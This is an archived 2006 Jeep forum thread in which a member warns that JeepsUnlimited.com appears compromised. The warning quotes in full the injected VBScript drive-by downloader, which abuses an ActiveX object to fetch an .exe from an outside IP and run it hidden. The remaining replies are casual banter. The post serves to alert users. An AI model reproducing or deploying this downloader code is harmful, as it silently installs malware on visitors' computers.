PDA

View Full Version : Warning: Worm/Trojan/Virus at JeepsUnlimited.com


Glenn B
September 21st, 2006, 15:06
Just a heads up for those that "might" visit JU.

Some visitors seem to be receiving warnings from their Anti-Virus systems after viewing JU. This does appear to be a valid issue, and their server is likely compromised.

I have sent a PM to Jason (Admin) at JU, and no response as yet. You can see posts about the issue in their support and OT forums.

The issue seems to be either a worm or trojan downloader.
This is part of the code in the file:
a.open "GET", "http://209.200.229.100/~richar8/d.exe",0
That file is hosted at Lunarpages. Here is the account that is probably compromised on their servers: http://aaryn.lunarpages.com/~richar8/ (http://aaryn.lunarpages.com/%7Erichar8/)So JU is likely compromised and is pulling that .exe file from another server client account that is likely compromised.

The file loaded to your PC contains the following code:
(Do NOT try to load the code)
<script language="VBScript">
On Error Resume Next
a=location.href
done = 0
set d = document.createelement("object")
d.setattribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
set a = d.createobject("Microsoft.XMLHTTP","")
set e = d.createobject("Scripting.FileSystemObject","")
set g = d.createobject("Adodb.Stream","")
for i = 0 to 5
if i = 0 then x = "c:\windows\temp" else if i = 1 then x = "c:\temp" else if i = 2 then x = "c:\tmp" else if i = 3 then x = "c:\winnt\temp" else if i = 4 then x = "c:\" end if
h = e.buildpath(x,"\d.exe")
g.type = 1
a.open "GET", "http://209.200.229.100/~richar8/d.exe (http://209.200.229.100/%7Erichar8/d.exe)",0
a.send
g.open
g.write a.responsebody
g.savetofile h,2
g.close
if err.number <> 0 then
Err.Clear
else
set i = d.createobject("shell.application","")
i.shellexecute h,"","","open",0
exit for
End if
next
</script>

TRNDRVR
September 21st, 2006, 15:13
In English? :dunno:

OT
September 21st, 2006, 15:14
In English? :dunno:
Don't go there, or you'll be stupid.

Ramsey
September 21st, 2006, 15:16
Would this be considered a form of darwinism?

RichP
September 21st, 2006, 15:24
Would this be considered a form of darwinism?

I was just sorely tempted to put a link in but luckily it was only momentary and I resisted...
Glenn, what you doing next wed, I'm gonna be in NYC for a job interview at 10, lunch ?

Glenn B
September 21st, 2006, 15:28
I was just sorely tempted to put a link in but luckily it was only momentary and I resisted...
Glenn, what you doing next wed, I'm gonna be in NYC for a job interview at 10, lunch ?
The 27th?

Gimmee a call. My GF is in Europe all next week, so I think we can make a connection.

Geepfreak
September 21st, 2006, 15:33
Glenn, what you doing next wed, I'm gonna be in NYC for a job interview at 10, lunch ?
The 27th?

Gimmee a call. My GF is in Europe all next week, so I think we can make a connection.

I makes my heart warm, when I see romance blossoming.
Good Luck Fellas. :thumbup:

:D

lilredwagn
September 21st, 2006, 16:32
:heart: Opera

88flexj
September 21st, 2006, 16:42
Don't go there, or you'll be stupid.

:roflmao: :roflmao: :roflmao:

dallas xjs
September 21st, 2006, 16:46
The 27th?

Gimmee a call. My GF is in Europe all next week, so I think we can make a connection.
we here want pics to guys... http://i9.tinypic.com/2iid155.jpg

Beej
September 21st, 2006, 16:50
we here want pics to guys... Que?

djblade311
September 21st, 2006, 16:56
qu'est ce que c'est? parlez-vous anglais?

Como? Habla-ingles?

dallas xjs
September 21st, 2006, 17:04
Que?
wth is Que,my goole no workie

Beej
September 21st, 2006, 17:11
wth is Que,my goole no workie No problemo, this explains it...

dallas xjs
September 21st, 2006, 17:17
ahhhhhhh your killing me..... http://i9.tinypic.com/4dd5b2f.jpg

OT
September 21st, 2006, 17:38
we here want pics to guys...
"Que?" as in, "In English?:dunno:

UNCC_99XJ
September 21st, 2006, 19:23
wth is Que,my goole no workie

No habla espanol?

RichP
September 21st, 2006, 19:43
No habla espanol?

HEY, I DIN"T PICK no #2 option.....

RalphXJ
September 21st, 2006, 19:54
Just a heads up for those that "might" visit JU.

Some visitors seem to be receiving warnings from their Anti-Virus systems after viewing JU. This does appear to be a valid issue, and their server is likely compromised.

I have sent a PM to Jason (Admin) at JU, and no response as yet. You can see posts about the issue in their support and OT forums.


Jason has been on vaction for the last 2 days, he will be back in the office on monday. I'm sure he'll check the site sometime in the next day or so, but it might take him some time to get your PM.

I'll let him know whats up if I talk to him tomorow.

Geepfreak
September 21st, 2006, 21:33
Jason has been on vaction for the last 2 days, he will be back in the office on monday. I'm sure he'll check the site sometime in the next day or so, but it might take him some time to get your PM.

I'll let him know whats up if I talk to him tomorow.


It's JU, if it took 3 years, the majority of us would never know(or care)
:D